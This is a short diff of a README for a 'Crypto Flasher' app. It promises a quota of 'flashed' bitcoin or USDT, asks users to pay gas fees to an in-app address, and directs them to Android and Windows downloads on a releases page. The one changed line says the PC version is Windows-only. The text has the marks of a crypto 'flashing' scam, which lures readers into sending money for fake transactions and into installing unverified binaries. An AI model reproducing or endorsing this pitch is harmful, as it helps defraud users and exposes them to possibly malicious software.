erasto79/CryptoFlasher/README.md

 When you gain app access, you'll have a limited spendable quota of either bitcoin or USDT, but you'll be responsible for your gas fee for the flashing transactions.
 You'll find a gas address in-app and the gas topup process is simple.
 Installation

-Android

-The latest android APK is available on the release page.

 PC

-Crypto Flasher® is available for Windows users.
+Crypto Flasher® is available for Windows users only at this time.
 You can find the PC version on the releases page.

 Usage